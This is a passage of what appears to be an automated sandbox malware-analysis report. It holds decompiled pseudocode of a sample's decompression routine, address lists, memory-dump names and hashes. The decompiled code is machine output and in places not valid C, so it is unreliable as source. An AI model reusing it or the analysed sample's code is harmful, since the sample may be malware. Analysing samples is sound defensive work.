							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x00406a5f
0x00406a66
0x00406a6c
0x00406a72
0x00000000
0x00406a76
0x00406a82
0x00406a82
0x00406a82
0x00406a8b
0x00000000
0x00000000
0x00406a91
0x00000000
0x00406a98
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aad
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406af8
0x00406afb
0x00406b23
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406afd
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b15
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6c
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b71
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b8e
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd4
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727c
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b2
0x004072b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004072bb
0x004072bb
0x004072bf
0x0040746e
0x00000000
0x0040746e
0x004072cb
0x004072d2
0x004072da
0x004072da
0x004072da
0x004072dd
0x004072e0
0x004072e0
0x00000000
0x00000000
0x00406bfe
0x00406c00
0x00406c03
0x00406c74
0x00406c77
0x00406c7a
0x00406c81
0x00406c8b
0x00000000
0x00406c8b
0x00406c05
0x00406c09
0x00406c0c
0x00406c0e
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c26
0x00406c2a
0x00406c31
0x00406c34
0x00406c3b
0x00406c3f
0x00406c47
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4b
0x00406c4e
0x00406c6c
0x00406c6e
0x00000000
0x00406c6e
0x00406c50
0x00406c53
0x00406c56
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00000000
0x00000000
0x00406e9d
0x00406ea1
0x00406ebf
0x00406ec2
0x00406ec9
0x00406ecc
0x00406ecf
0x00406ed2
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406eed
0x00406ef2
0x00000000
0x00406ef2
0x00406ea3
0x00406ea6
0x00406ea9
0x00406eb3
0x00000000
0x00000000
0x00406f07
0x00406f0b
0x00406f2e
0x00406f31
0x00406f34
0x00406f3e
0x00406f0d
0x00406f0d
0x00406f10
0x00406f13
0x00406f16
0x00406f23
0x00406f26
0x00406f26
0x00000000
0x00000000
0x00406f4a
0x00406f4e
0x00000000
0x00000000
0x00406f54
0x00406f58
0x00000000
0x00000000
0x00406f5e
0x00406f60
0x00406f64
0x00406f64
0x00406f67
0x00406f6b
0x00000000
0x00000000
0x00406fbb
0x00406fbf
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fd6
0x00000000
0x00406fd6
0x00406fc1
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00406ffc
0x00406ffc
0x00406fff
0x00407002
0x00407005
0x00407005
0x00407008
0x0040700f
0x00407014
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00407408
0x00000000
0x00407408
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc2
0x00000000
0x00000000
0x00406cc8
0x00406cce
0x00000000
0x00000000
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cff
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d32
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d3b
0x00406d42
0x00406d45
0x00000000
0x00406d4b
0x00000000
0x00406d4b
0x00000000
0x00406d50
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d75
0x00406d75
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d98
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc3
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dc8
0x00406dcf
0x00406dd2
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406dd9
0x00000000
0x00000000
0x00406e14
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e33
0x00406e36
0x00406e39
0x00406e39
0x00406e3f
0x00406ddd
0x00406ddd
0x00406de0
0x00000000
0x00406de0
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e87
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e8c
0x00406e93
0x00406e96
0x00000000
0x00406e98
0x00000000
0x00406e98
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00406ef5
0x00406ef5
0x00406ef8
0x00000000
0x00000000
0x00407234
0x00407238
0x0040725a
0x0040725d
0x00407267
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407244
0x00407247
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00407328
0x00407328
0x00000000
0x00407328
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x0040724b
0x0040724b
0x0040724e
0x00000000
0x00000000
0x004073e2
0x004073e5
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00407366
0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x004072e6
0x004072e6
0x00000000
0x004072e6
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738a
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073bc
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x0040722d
0x00407462
0x00407484
0x0040748a
0x0040748c
0x00407493
0x00000000
0x00000000
0x00406a91
0x00407499
0x00407499
0x00000000

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
Instruction ID: 0eb50412ba17cbd686f9e43e0b7d85c943a315db4d9133bb66c32ce13943f697
Opcode Fuzzy Hash: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
Instruction Fuzzy Hash: E7813471E04229DBDF24CFA9C8447ADBBB0FB44305F24816ED856BB281C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406E9D Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406E9D() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004074A1))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
